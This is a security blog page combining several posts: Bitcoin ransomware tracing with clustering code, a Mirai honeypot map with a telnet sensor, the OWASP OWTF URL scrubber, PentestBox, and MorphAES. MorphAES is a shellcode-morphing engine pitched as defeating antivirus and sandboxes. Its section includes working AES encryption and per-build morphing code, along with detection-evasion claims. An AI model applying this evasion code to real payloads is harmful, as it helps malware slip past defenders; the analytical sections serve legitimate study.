Vulnerable Life by Vulneraman | Information Security Blog

The End of Bitcoin Ransomware?

Section 1. Introduction

Bitcoin, a virtual currency generated through peer-to-peer technology and not controlled by any central authority, is used not only for paying for goods and services, but also as a means of collecting ransom payments. The reason why ransomware creators use the virtual currency is the anonymity that Bitcoin appears to provide, i.e., one can conduct Bitcoin transactions without using his/her real name. In this regard, an FBI report on ransomware issued in 2015 points out: “Criminals prefer Bitcoin because it’s easy to use, fast, publicly available, decentralized and provides a sense of heightened security/anonymity.”

Despite the alleged anonymity of Bitcoin transactions, there are several ways in which the identity of Bitcoin users can be revealed. The purpose of this article is to examine them in the context of Bitcoin ransomware. More specifically, we will examine the classical forensic approach (Section 2) as well as two innovative approaches, namely, the use of the software applications BitCluster (Section 3) and Elliptic (Section 4). Finally, we provide concluding remarks (Section 5).

Section 2. Classical forensic approach

Bitcoin is not an anonymous but a pseudonymous virtual currency. This means that the names of the participants in Bitcoin transactions are not recorded, but the pseudonyms under which the transactions are concluded are public: every transaction is permanently stored on the blockchain, which anyone can read. The public key hashes (addresses) of Bitcoin users are their pseudonyms. Hence, if law enforcement authorities succeed in linking all public key hashes used by a criminal with his/her name, the authorities obtain information about all Bitcoin transactions completed by the criminal.

The classical forensic approach used for revealing the identities of Bitcoin users is to attempt to link a public key hash with a real name. Such a link can be established by using two methods, namely, (1) identifying a Bitcoin user solely on the basis of personal information collected by Bitcoin-processing businesses and (2) identifying a Bitcoin user on the basis of information about his/her use of a public key hash.

The first method consists of the following three steps: (1) sending a legal demand to Bitcoin-processing businesses (e.g., Bitcoin wallets and Bitcoin exchanges); (2) analyzing the received information; and (3) identifying the user of a particular public key hash. Regarding the first step, it should be noted that a large number of Bitcoin-processing businesses collect personal information from their customers. For example, e-shops which accept Bitcoin use shipping addresses collected from their customers; such addresses can be used to identify the buyers. As for the second step, many e-discovery software applications allow their users to analyze a vast amount of electronic data, such as scanned paper documents, web data, cloud data, and data stored in mobile applications. The third step will be easily completed if the user of a particular public key hash has provided a Bitcoin-processing business with his/her personal information.

The second method also consists of three steps, namely, (1) collecting information about the use of a public key hash, (2) combining the collected information with other available information, and (3) analyzing the research findings. For example, if transactions involving a public key hash consistently fall into the same time slots as the activity of a particular Facebook account, the hypothesis that the user of the public key hash is the owner of that Facebook account becomes worth pursuing. Such timing correlation is circumstantial, however, and needs corroboration before it can be treated as an identification.

The classical forensic approach still helps numerous law enforcement authorities in revealing the identities of participants in Bitcoin transactions. As Peter Van Valkenburgh, director of research at a Washington think tank focused on digital currencies, states: “Old fashioned police work is always going to be the main method of investigation.” The classical forensic approach is particularly helpful when investigating illegal Bitcoin exchanges which are related to ransomware. This is because such exchanges often use traditional payment accounts (e.g., a bank account) to keep the money received in exchange for Bitcoins. For example, in 2015, the FBI arrested two individuals for operating an illegal Bitcoin exchange, which was allegedly used for selling Bitcoins to victims of ransomware. The individuals transferred money to bank accounts in Eastern Europe, Hong Kong, and Cyprus and received money in bank accounts in the British Virgin Islands and Cyprus.

Section 3. BitCluster

BitCluster is a freely downloadable open-source tool which allows its users to group Bitcoin transactions by their participants. Such groups of transactions may be used for identifying Bitcoin users. Commenting on the purpose of the tool, Professor David Décary-Hétu, one of the creators of BitCluster, stated: “Our goal was to see, how much data can you gather on people who are using the Bitcoin network, and can you aggregate the Bitcoin wallets which seem to be anonymous and isolated from one another?”

BitCluster allows law enforcement authorities to calculate the amount of money received by a group of public key hashes. Consequently, the tool can be used for detecting ransomware schemes which generate significant amounts of ransom money. However, it is worth mentioning that BitCluster has an important disadvantage. Namely, the grouping loses most of its value if a ransomware creator generates a new public key hash for every payment: each payment then lands in its own single-address group, and the groups can only be joined again once the criminal spends coins from several of those addresses in the same transaction.
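The grouping that such tools perform rests on the common-input-ownership heuristic: every address spent together as inputs of one transaction is assumed to belong to the same owner. The following Python, added here as an illustration rather than BitCluster’s own code, implements that heuristic as a union-find and shows both what it yields against the one-address-per-payment scheme and the moment at which the groups merge. The transactions, address labels and amounts are constructed; amounts are in satoshi.

```python
from collections import defaultdict

# Added example, not BitCluster's code: common-input-ownership clustering.
# Address strings and transactions below are constructed for illustration.


class AddressClusterer:
    """Union-find over addresses that are co-spent as inputs of one transaction."""

    def __init__(self):
        self._parent = {}
        self._received = defaultdict(int)   # satoshi received per address

    def _find(self, addr):
        self._parent.setdefault(addr, addr)
        root = addr
        while self._parent[root] != root:
            root = self._parent[root]
        while self._parent[addr] != root:   # path compression
            nxt = self._parent[addr]
            self._parent[addr] = root
            addr = nxt
        return root

    def _union(self, a, b):
        ra, rb = self._find(a), self._find(b)
        if ra != rb:
            self._parent[rb] = ra

    def add_tx(self, tx):
        """tx = {"inputs": [addr, ...], "outputs": [(addr, satoshi), ...]}"""
        inputs = tx["inputs"]
        for addr in inputs:                 # all inputs are co-spent: same owner
            self._union(inputs[0], addr)
        for addr, amount in tx["outputs"]:
            self._find(addr)                # register the address as its own group
            self._received[addr] += amount

    def cluster_of(self, addr):
        root = self._find(addr)
        return frozenset(a for a in list(self._parent) if self._find(a) == root)

    def cluster_received(self, addr):
        """Total ever received by every address in addr's cluster."""
        return sum(self._received[a] for a in self.cluster_of(addr))

    def clusters(self):
        groups = defaultdict(set)
        for a in list(self._parent):
            groups[self._find(a)].add(a)
        return [frozenset(g) for g in groups.values()]


def cluster_transactions(txs):
    clusterer = AddressClusterer()
    for tx in txs:
        clusterer.add_tx(tx)
    return clusterer


BTC = 100_000_000
# Constructed: three victims each pay 1 BTC to a fresh address (one per payment).
RANSOM_PAYMENTS = [
    {"inputs": ["victim-1"], "outputs": [("ransom-addr-1", 1 * BTC)]},
    {"inputs": ["victim-2"], "outputs": [("ransom-addr-2", 1 * BTC)]},
    {"inputs": ["victim-3"], "outputs": [("ransom-addr-3", 1 * BTC)]},
]
# Constructed: the operator later sweeps all three into one cash-out address.
SWEEP = {"inputs": ["ransom-addr-1", "ransom-addr-2", "ransom-addr-3"],
         "outputs": [("cash-out", 3 * BTC - 50_000)]}

if __name__ == "__main__":
    before = cluster_transactions(RANSOM_PAYMENTS)
    print("before sweep:", sorted(map(sorted, before.clusters())))
    after = cluster_transactions(RANSOM_PAYMENTS + [SWEEP])
    print("after sweep: ", sorted(after.cluster_of("ransom-addr-1")),
          "received", after.cluster_received("ransom-addr-1") / BTC, "BTC")
```

Before the sweep every ransom address is a cluster of one and the scheme looks like three unrelated 1 BTC payments; after it, the three addresses collapse into one cluster that has received 3 BTC. Note what the heuristic does not do: the cash-out address stays in its own cluster, because nothing links an output address to the inputs that funded it.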

Although BitCluster is not created to be specifically used by law enforcement authorities, it can be used as a prototype for the development of comprehensive Bitcoin forensic software which is specifically tailored to the needs of the FBI and its foreign counterparts.

Section 4. Elliptic

Elliptic is a new technology which allows researchers to (1) trace entities’ transactions through the blockchain automatically and instantly; (2) uncover relationships between different entities; and (3) employ artificial intelligence to acquire digital clues from the Internet and the dark Web which can be used for uncovering the real identities of participants in Bitcoin transactions. It should also be noted that Elliptic assigns a risk score (0 = low risk, 10 = high risk) to participants in Bitcoin transactions.

The relationships between different entities are presented in Elliptic in the form of a comprehensive graphical user-interface. A screenshot of such a user-interface is provided below.

Figure 1: A screenshot of Elliptic user-interface

The screenshot indicates the relationships between the illegal marketplace “Silk Road” and various other entities processing Bitcoins. According to a report published by Trend Micro in 2013, “Silk Road” generated sales amounting to over 9.5 million Bitcoins, which equalled about USD 1.2 billion.

Financial institutions and law enforcement authorities widely use Elliptic to trace the origin of Bitcoins. Up until the present moment, it has processed more than USD 2 billion in Bitcoin transactions. Without the possibility to trace the origin of Bitcoins, legitimate financial organizations may trade Bitcoins coming from illegal activities. Consequently, such processing may raise legal issues (e.g., violation of anti-money laundering laws) as well as reputational ones (acquiring the reputation of an institution involved in criminal activities). In an interview on this subject, Dr. Tom Robinson, COO & Co-Founder of Elliptic, pointed out: “We realized that what was holding back Bitcoin use by financial institutions was illicit activity on the dark Web. Financial institutions were scared to death.”

By providing actionable intelligence to law enforcement agencies and financial institutions, Elliptic may significantly hamper the operation of ransomware schemes. More specifically, Elliptic may facilitate the arrest of operators of ransomware schemes and enable financial institutions to refuse to process Bitcoins collected through ransomware attacks.

Section 5. Conclusion

The appearance of Bitcoin and other cryptocurrencies was the main cause for the recent proliferation of ransomware attacks. As Craig Williams, a security expert at Cisco, observed: “The ability to demand payment in Bitcoin, a difficult-to-trace virtual currency not controlled by any country, was ‘the birth of ransomware’ and has helped drive its success since the currency’s introduction in 2009.” The most widely known Bitcoin ransomware applications are CryptoWall and CryptoLocker.

The main reason for the success of Bitcoin ransomware is the difficulty of tracing Bitcoin transactions. If this difficulty is eliminated, we can expect a decrease in the number of ransomware attacks which request victims to pay a ransom in Bitcoin. Although Bitcoin is considered to be an anonymous cryptocurrency, this article examined three approaches to revealing the identity of criminals involved in Bitcoin ransomware schemes. Although none of the three approaches guarantees the complete identification of such criminals, the discussed approaches may provide a vast amount of information necessary for guiding governmental authorities in the investigation of ransomware attacks.

However, cyber-criminals do not remain passive observers of the developments of the discussed technologies. According to a study by Kharraz, Robertson, Balzarotti, Bilge, and Kirda, organizers of ransomware schemes have started using techniques to protect their privacy, such as using multiple independent Bitcoin addresses, each of which processes only small Bitcoin amounts. According to the same study, 84.46% of the examined Bitcoin addresses which were used for receiving ransomware payments had no more than six transactions, 68.93% of the examined addresses were active for no more than ten days, and 48.9% of the analyzed addresses received no more than 2 Bitcoins. In the light of these findings, we may conclude that the new approaches to revealing the identity of Bitcoin users must constantly evolve to reflect the ever-changing ransomware landscape.


  1. Brook, C., ‘Bitcoin Phishing Campaign Uncovered,’ Threat Post, 21 June 2016.
  2. Butnix, J., ‘Haggling The Price After A Ransomware Infection Can Pay Off,’ Live Bitcoin News, 19 July 2016.
  3. Caffyn, G., ‘FBI: Malware Victims Should Pay Bitcoin Ransoms,’ CoinDesk, 26 October 2015.
  4. Ciancaglini, V. et al., ‘Deepweb and Cybercrime,’ Trend Micro, 2013.
  5. Cox, J., ‘7 Ways the Cops Will Bust You on the Dark Web,’ MotherBoard, 26 June 2016.
  6. Cox, J., ‘This Open Source Tool Can Map Out Bitcoin Payments,’ MotherBoard, 18 July 2016.
  7. Datt, S., ‘Learning Network Forensics,’ Packt Publishing, 2016.
  8. Detsch, J., ‘Could bitcoin hold the key to stopping ransomware?,’ The Christian Science Monitor, 1 July 2016.
  9. Dunn, J. E., ‘Elliptic: UK Bitcoin startup plots future in dark web forensics,’ Tech World, 19 July 2016.
  10. Elliptic, company website.
  11. ‘Evaluating the Customer Journey of Crypto-Ransomware and the Paradox Behind It,’ F-Secure, 18 July 2016.
  12. Gautham, ‘Bitcoin Ransomware May Soon Become a Thing of the Past,’ News BTC, 3 July 2016.
  13. Kharraz, A. et al., ‘Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks,’ NEU SecLab, 23 June 2015.
  14. ‘KSN Report: PC ransomware in 2014-2016,’ Securelist, 22 June 2016.
  15. ‘Manhattan U.S. Attorney Announces Charges Against Two Florida Men for Operating an Underground Bitcoin Exchange,’ FBI, 21 July 2015.
  16. Narayanan, A. et al., ‘Bitcoin and Cryptocurrency Technologies: A Comprehensive Introduction,’ Princeton University Press, 2016.
  17. Stevenson, A., ‘We’re finally getting some answers over the massive JPMorgan hack,’ Business Insider UK, 22 July 2015.
  18. Titcomb, J., ‘Bitcoin surveillance firm Elliptic raises $5m as banks push into blockchain,’ The Telegraph, 20 March 2016.
  19. Van Impe, K., ‘Will Blockchain Technology Replace Traditional Business Models?,’ Security Intelligence, 6 July 2016.
  20. Williams-Grut, O., ‘New bitcoin technology can tell banks where coins come from with incredible accuracy,’ Business Insider UK, 18 June 2015.

Original Post:

Here’s a Live Map of the Mirai Malware Infecting the World

Last weekend, a hacker publicly released the code of “Mirai”, the piece of Internet of Things malware that was used to create some of the most powerful botnets ever. Those botnets fired record breaking attacks at well-known security journalist Brian Krebs’s site, as well as a popular server provider company.

Naturally, this is a notable event for security researchers. But with one tool, ordinary, non-technical citizens can watch the malware spread too.

On Monday, the security researcher known as MalwareTech released a map showing, in real-time, infections of Mirai across the world.

As MalwareTech explains in a blog post, the scanner uses hundreds of custom servers designed to emulate vulnerable internet of things devices. These act as honeypots, and report when someone, somewhere, tries to hack them.
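A sensor of that kind only needs to look enough like a device’s telnet login to keep a scanner talking. The Python below is an added illustration, not MalwareTech’s sensor code: it strips telnet option negotiation, plays the login/password prompts, rejects every attempt, and records each (source, username, password) triple so that hits can be aggregated the way the map does. The source address and credential pairs in the usage are constructed sample input; port 2323 is one of the two telnet ports Mirai scans.

```python
import asyncio
from collections import Counter

# Added example, not MalwareTech's code: a minimal telnet-login emulator that
# records scanner hits. Sample sources and credentials below are constructed.

IAC = 0xFF


def strip_iac(data: bytes) -> bytes:
    """Remove telnet option negotiation so only the bytes the scanner 'typed' remain."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b == IAC and i + 1 < len(data):
            cmd = data[i + 1]
            if cmd == IAC:              # escaped literal 0xFF
                out.append(IAC)
                i += 2
            elif 251 <= cmd <= 254:     # WILL/WONT/DO/DONT carry an option byte
                i += 3
            else:                       # other two-byte commands
                i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


class TelnetSensor:
    """One scanner connection: feed it received bytes, send back what it returns,
    and collect every (source, username, password) attempt it sees."""

    BANNER = b"\r\nlogin: "

    def __init__(self, source_ip):
        self.source_ip = source_ip
        self._buf = b""
        self._user = None
        self.attempts = []

    def feed(self, data: bytes) -> bytes:
        self._buf += strip_iac(data)
        reply = b""
        while b"\n" in self._buf:
            line, self._buf = self._buf.split(b"\n", 1)
            text = line.rstrip(b"\r").decode("latin-1")
            if self._user is None:
                self._user = text
                reply += b"Password: "
            else:
                self.attempts.append((self.source_ip, self._user, text))
                self._user = None
                reply += b"\r\nLogin incorrect\r\nlogin: "   # never let them in
        return reply


def summarize(attempts):
    """What the map aggregates: hits per source and the most-tried credential pairs."""
    by_source = Counter(src for src, _, _ in attempts)
    by_cred = Counter((u, p) for _, u, p in attempts)
    return by_source, by_cred


async def _serve_one(reader, writer):
    """asyncio handler: one TelnetSensor per connection (not run by the usage below)."""
    peer = writer.get_extra_info("peername")[0]
    sensor = TelnetSensor(peer)
    writer.write(TelnetSensor.BANNER)
    await writer.drain()
    while True:
        data = await reader.read(256)
        if not data:
            break
        writer.write(sensor.feed(data))
        await writer.drain()
    writer.close()
    for hit in sensor.attempts:
        print("hit", hit)


if __name__ == "__main__":
    # Offline usage with a constructed session; to listen for real, replace with:
    # asyncio.run(asyncio.start_server(_serve_one, "0.0.0.0", 2323))
    s = TelnetSensor("203.0.113.5")
    s.feed(b"\xff\xfd\x01root\r\n")
    s.feed(b"xc3511\r\n")
    print(summarize(s.attempts))
```

Because the sensor always answers “Login incorrect”, a scanner keeps walking its credential list, and each pair it tries is logged; nothing is ever executed on the sensor side.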

“It’s a stream from the sensors; as soon as you connect it will notify you of each hit,” MalwareTech told Motherboard in a Twitter message.

Serbia, China, Brazil, Russia, India, Pakistan: the list of affected countries goes on and on, as this capture of the map shows:

“Nothing stood out, just that the botnet was mostly CCTV cameras,” MalwareTech continued.

At the end of September, Krebs’ site Krebs on Security was the victim of a record-breaking DDoS attack of around 660 Gbps of traffic. DDoS-protection service Akamai, which had been providing Krebs with pro-bono protection, had to drop the journalist from their network. Two botnets were behind that attack, consisting of around 980,000 and 500,000 devices respectively, according to Level 3 Communications, one of the world’s largest internet backbone providers.

What made these botnets stand out, apart from their raw power, was that they consisted almost exclusively of internet-connected cameras and other “smart” devices. Days after the attack on Krebs, French hosting provider OVH reported seeing attacks of 900 Gbps and 1 Tbps.

Now, everyone can bask, or recoil in terror, at the sight of lowly cameras forming ever more powerful botnets.

MalwareTech Live Map of Mirai

Original Post:

OWASP OWTF – Offensive Web Testing Framework

OWASP Offensive Web Testing Framework is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST.


The purpose of this tool is to automate the manual and uncreative parts of pen testing. For example, figuring out how to call “tool X”, then parsing the results of “tool X” manually to feed “tool Y”, and so on, is time consuming.

By reducing this burden we hope pen testers will have more time to:

  • See the big picture and think out of the box,
  • Find, verify and combine vulnerabilities efficiently,
  • Have time to investigate complex vulnerabilities like business logic, architectural flaws, virtual hosting sessions, etc.
  • Perform more tactical/targeted fuzzing on seemingly risky areas
  • Demonstrate true impact despite the short time-frames we are typically given to test.


This tool is however not a silver bullet and will only be as good as the person using it. Understanding and experience will be required to correctly interpret the tool output and decide what to investigate further in order to demonstrate the impact.


  • Web UI: configure and monitor OWTF via a responsive and powerful interface accessible via your browser.
  • Exposes RESTful APIs to all core OWTF capabilities.
  • Instead of implementing yet another spider (a hard job), OWTF will scrub the output of all tools/plugins run to gather as many URLs as possible.
  • Scan by various aggression levels: OWTF supports scans which are based on the aggressiveness of the plugins/tools invoked.
  • Extensible: OWTF manages tools through ‘plugins’, making it trivial to add new tools.
  • OWTF has been developed keeping Kali Linux in mind, but it also supports other pentesting distros such as Samurai-WTF, etc.
  • Tool paths and configuration can be easily modified in the web interface.
  • Fastest Python MiTM proxy yet!
  • Crash reporting directly to Github issue tracker
  • Comprehensive interactive report at end of each scan
  • Easy plugin-based system; currently 100+ plugins!
  • CLI and web interface
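The scrubbing step deserves a closer look, because the URLs pulled out of one tool’s output become the next tool’s targets, and an out-of-scope host must not leak into that list. The Python below is an added example, not OWTF’s implementation: it extracts URLs from raw tool output with a regular expression, normalises them so duplicates collapse, drops fragments, and keeps only hosts in an explicit scope set. The tool output lines are constructed to resemble scanner and directory brute-forcer output.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Added example, not OWTF's code: scrub URLs out of arbitrary tool output and
# keep only in-scope ones. SAMPLE_OUTPUTS below is constructed.

URL_RE = re.compile(r"""https?://[^\s'"<>()\[\]]+""", re.IGNORECASE)
_DEFAULT_PORT = {"http": 80, "https": 443}


def normalize_url(url: str) -> str:
    """Lower-case scheme and host, drop default ports and fragments, ensure a path."""
    url = url.rstrip(".,;:")                    # trailing punctuation from prose
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    port = parts.port                           # ValueError if the port is not numeric
    if port in (None, _DEFAULT_PORT[parts.scheme]):
        netloc = host
    else:
        netloc = f"{host}:{port}"
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))


def scrub_urls(tool_outputs, scope_hosts):
    """Sorted, de-duplicated in-scope URLs found anywhere in the given outputs."""
    scope = {h.lower() for h in scope_hosts}
    found = set()
    for text in tool_outputs:
        for match in URL_RE.finditer(text):
            try:
                url = normalize_url(match.group(0))
            except ValueError:
                continue                        # malformed port: not worth a request
            if urlsplit(url).hostname in scope:
                found.add(url)
    return sorted(found)


# Constructed tool output: a scanner, a directory brute-forcer and a stray
# out-of-scope reference that must be dropped.
SAMPLE_OUTPUTS = [
    "+ Target: http://Target.Example:80/\n"
    "+ /admin/: Directory found. http://target.example/admin/\n"
    "+ See https://cirt.net/nikto2 for details",
    "==> DIRECTORY: http://target.example/backup/\n"
    "+ http://target.example/login.php?next=/admin (CODE:200)",
    "Found link: https://cdn.other-host.example/app.js#top",
]

if __name__ == "__main__":
    for url in scrub_urls(SAMPLE_OUTPUTS, {"target.example"}):
        print(url)
```

The scope check is deliberately a whitelist of hostnames rather than a blacklist: a new tool that happens to mention a third-party host in its output will not cause the framework to start probing it.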


Original Post:

Portable Penetration Testing Distribution for Windows: PentestBox

    PentestBox is not like other penetration testing distributions, which run in virtual machines. It provides all security tools as a software package, eliminating the requirement for virtual machines or dual-boot environments on the Windows operating system. According to its authors, it was created because a majority of penetration testing distribution users use Windows.

Easy to Use

It is a command-line utility, which is all you need.


Awesome Design

It is the same green font on a black terminal, but in a modern way.


Best Performance

PentestBox directly runs on host machine instead of virtual machines, so performance gain is obvious.


No Dependencies Needed

All the dependencies required by the tools are inside PentestBox, so you can even run PentestBox on a freshly installed Windows without any hassle.



PentestBox is entirely portable, so now you can carry your own Penetration Testing Environment on a USB stick. It will take care of dependencies required to run tools which are inside it.


Linux Environment

PentestBox contains nearly all Linux utilities like bash, cat, chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others. It even contains your favourite text editor “vim”.  Because of this, most penetration testing tools which were earlier compatible only with Linux are working smoothly in PentestBox on Windows.


No Driver Issue

Windows already has broad driver support for graphics cards and wireless chipsets, so you don’t have to worry about driver compatibility issues.



Only the best tools went into PentestBox, but if you miss something you can easily install it using tools-manager from the inside of PentestBox environment.


Less memory Usage

PentestBox runs on the host machine without any need for a virtual machine. It only needs about 20 MB of RAM, compared to the 2 GB or more needed for running virtual machine distributions.


Less Disk Usage

PentestBox is very light. It requires less than a third of the disk space of other penetration testing Linux distributions.


Inbuilt Browser

PentestBox packs a Mozilla Firefox Browser with nearly all security addons.


Automatic Updates

Automatic update feature will keep your tool up to date.


Can Be Shared On A Network

You can use PentestBox on many computers by sharing it over a network. You don’t have to install it on each and every computer that you want it to run on. Just install PentestBox on one computer and share it with all other computers on the same network. Keep that share read-only for everyone except whoever maintains it: anyone who can write to it can replace the tools every other machine runs.

No Metasploit ?

Metasploit contains exploits/payloads inside its folder structure, so when it is installed on Windows machines nearly all anti-virus products and firewalls fire up. Metasploit officially instructs users to disable anti-virus and firewall software while using it. It’s your call. If you are willing to switch off your anti-virus program and want to use Metasploit on Windows, you can download the Windows installer for Metasploit from the official Metasploit website.


PentestBox throwing up red flags ?

PentestBox is packed with UPX, which some antivirus products identify as malware. You can scan PentestBox.exe yourself and see the result. As an alternative, there is a PentestBox.bat file in the same directory which won’t show any warnings when run. Some Ruby gems can also be flagged as virus/malware; you can remove those if your antivirus flags them. THC-SSL-DOS will also be flagged because of its action against SSL servers. If you are worried about those warnings, you can allow your antivirus to remove those files; in that case you can start PentestBox through the PentestBox.bat file, and THC-SSL-DOS will not work. All other tools/products will work normally.


How to include your own Tool

If you want to include a tool which is not currently present in PentestBox then below are the ways to include it.

  • If it is Python based program
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • As Python is configured inside PentestBox, you can directly go to that directory and then run that program by prepending python to the filename.
    • But if you want to set an alias for that program then please follow How to add an alias
  • If it is Ruby Based Program
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • As Ruby is configured inside PentestBox, you can directly go to that directory and then run that program by prepending ruby to the filename.
    • But if you want to set an alias for that program then please follow How to add an alias
  • If it is an executable file
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • You can directly access by moving to that folder and typing the filename.
    • But if you want to set an alias for that program then please follow How to add an alias





Original Post:

MorphAES – IDPS & SandBox & AntiVirus STEALTH KILLER

MorphAES is a polymorphic shellcode/malware engine with metamorphic properties and the capability to bypass sandboxes; its author presents it as the world’s first such engine and as undetectable by an IDPS. It is cross-platform as well as library-independent.


  • Polymorphism (AES encryption)
  • Metamorphism (logic and constants changing)
  • Platform independent (Linux/BSD/Windows)
  • IDPS stealthing (the total number of possible signatures for one given code is greater than the number of atoms in the universe)
  • Sandbox evasion (special assembly instructions)
  • Realism (no null bytes)
  • Can produce executables (malware)
  • Input code can have arbitrary length

Dependencies for the morpher:

  • Python 2.7 – main engine
  • Python Crypto 2.6 – for encryption

Dependencies for the code execution:

  • 64-bit Intel AES-NI – for decryption

Nonetheless, there are some limitations (aka white-hat aspects):

  • Metamorphism is not very robust and can be detected using regular expressions (but can be improved pretty easily)
  • Unicode null bytes might still work (but who cares?)
  • It will only work on 64-bit Intel processors with AES-NI support; since most current consumer CPUs (Pentium, Celeron, i3, i5, i7) and industry servers (Xeon) have it, this is more a specification than a limitation, and a 32-bit implementation is impractical
  • Almost any shellcode is guaranteed to work; arbitrary code (malware), however, is not
  • Windows/BSD PoC and executables are in progress…

How it works

  1. Shellcode padding with NOPs (since AES is a block cipher)
  2. Shellcode encryption with a random key using AES-128-ECB – polymorphism (ECB is the simplest mode but not the best: identical 16-byte plaintext blocks produce identical ciphertext blocks, which is itself a pattern a detector can look for)
  3. Constants randomization, logic changes, instructions modification and rewriting – metamorphism
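To make steps 1 and 2 concrete, here is a pure-Python AES-128-ECB encryptor together with the morph step: pad the shellcode to a 16-byte boundary with NOPs, pick a fresh random key per build, and retry until neither key nor ciphertext contains a null byte (the “Realism (no null bytes)” property listed above). It is an added example, not MorphAES’s own engine, and it deliberately leaves out the metamorphic decryptor rewriting of step 3. The shellcode bytes in the usage section are placeholders, not a working payload, and repeated_blocks() shows why ECB “is not the best”: identical plaintext blocks give identical ciphertext blocks.

```python
import os

# Added example, not MorphAES's code: minimal AES-128-ECB plus the pad /
# random-key / null-free retry "morph" step. Shellcode bytes are placeholders.


def _xtime(a):
    """Multiply by x (0x02) in GF(2^8) with the AES polynomial 0x11B."""
    a <<= 1
    return (a ^ 0x1B) & 0xFF if a & 0x100 else a


def _rotl8(v, s):
    return ((v << s) | (v >> (8 - s))) & 0xFF


def _make_sbox():
    """AES S-box: multiplicative inverse followed by the affine transform."""
    sbox = [0] * 256
    p = q = 1                                   # invariant: p * q == 1 in GF(2^8)
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3
        q = (q ^ (q << 1)) & 0xFF                                # q /= 3
        q = (q ^ (q << 2)) & 0xFF
        q = (q ^ (q << 4)) & 0xFF
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _make_sbox()


def _expand_key(key):
    """AES-128 key schedule: 44 words -> 11 round keys of 16 bytes (column-major)."""
    w = [list(key[4 * i:4 * i + 4]) for i in range(4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord + SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def _encrypt_block(block, round_keys):
    s = [b ^ k for b, k in zip(block, round_keys[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                # SubBytes
        s = [s[(i + 4 * (i % 4)) % 16] for i in range(16)]      # ShiftRows
        if rnd != 10:                                           # MixColumns
            mixed = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                mixed += [_xtime(a0) ^ _xtime(a1) ^ a1 ^ a2 ^ a3,
                          a0 ^ _xtime(a1) ^ _xtime(a2) ^ a2 ^ a3,
                          a0 ^ a1 ^ _xtime(a2) ^ _xtime(a3) ^ a3,
                          _xtime(a0) ^ a0 ^ a1 ^ a2 ^ _xtime(a3)]
            s = mixed
        s = [b ^ k for b, k in zip(s, round_keys[rnd])]         # AddRoundKey
    return bytes(s)


def aes128_ecb_encrypt(key, data):
    rks = _expand_key(key)
    return b"".join(_encrypt_block(data[i:i + 16], rks) for i in range(0, len(data), 16))


NOP = 0x90  # x86 single-byte nop


def pad_shellcode(shellcode):
    """Step 1: append NOPs so the length is a multiple of the AES block size."""
    return shellcode + bytes([NOP]) * (-len(shellcode) % 16)


def morph(shellcode, rng=os.urandom, max_tries=10_000):
    """Step 2: fresh random key per build, retried until key and ciphertext are null-free."""
    padded = pad_shellcode(shellcode)
    for _ in range(max_tries):
        key = rng(16)
        ct = aes128_ecb_encrypt(key, padded)
        if b"\x00" not in key and b"\x00" not in ct:
            return key, ct
    raise RuntimeError("no null-free key/ciphertext pair found")


def repeated_blocks(ciphertext):
    """ECB leak: number of ciphertext blocks that duplicate an earlier block."""
    blocks = [ciphertext[i:i + 16] for i in range(0, len(ciphertext), 16)]
    return len(blocks) - len(set(blocks))


if __name__ == "__main__":
    sample = b"\x31\xc0\x50"                    # placeholder bytes, not a payload
    for _ in range(2):
        key, ct = morph(sample)
        print("key", key.hex(), "ct", ct.hex())  # differs on every run
```

Two builds of the same input yield different keys and ciphertexts, which is the polymorphism; what stays constant is the decryptor stub, which is why step 3 exists. The null-free retry succeeds quickly for short inputs (each 16-byte block has a roughly 94% chance of containing no 0x00), but for long inputs the expected number of tries grows exponentially with the length, so a real morpher would switch to a per-block or encoder-based approach.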

For Linux:

sudo apt-get install python python-crypto

Execute the Python script and enter your shellcode, or nothing for a default Linux shell. You can specify your own execution address as well.
It is possible to build and execute on Windows/BSD/Mac as well, but I’m still testing it.
You can also use the Linux PoC in assembly:

as shellcode.s -o shellcode.o
ld shellcode.o -o shellcode

Every file is commented and explained

At this point it should be pretty obvious that the hashes would be different every time, but let’s compare the ssdeep hashes of 2 Linux executables of the same shellcode:

  • 96:GztTHyKGQh3lo6Olv4W4zS/2WnDf74i4a4B7UEoB46keWJl09:Gzty6VOlvqSTDflmNroh,
  • 96:GQtT23yKmFUh3lo6OlOnIrFS4rkoPPf74i4a4B7UEoB46keWJ5:GQtCGWVOlOWFSsPflmNroh,

Well, there’s something in common, but globally those are 2 different signatures, now what about the shellcode it-self:

  • 48:eip2bR2LRNtRPORDGRopRBXR3cRzER2vRU9BnH6ksr:Srn+,
  • 48:6RjNeR2IRN7RPWRDeRokRB5R3xRz3R28RUxFT2+75eFK9iKMAdXAJKo:O9Tdwoo,

Almost totally different signatures for the same morphed shellcode!
At the publication date, the executable was detected as shellcode by only 2 out of 53 antiviruses (AVG and Ikarus) on VirusTotal, but now it just fails to analyze.
malwr with Cuckoo 2 doesn’t see anything suspicious.
From the reverser’s perspective, IDA won’t see anything either.
Radare2 would show the real instructions only if assembled by the assembler itself; however, it doesn’t detect any crypto or suspicious activity for the executable.
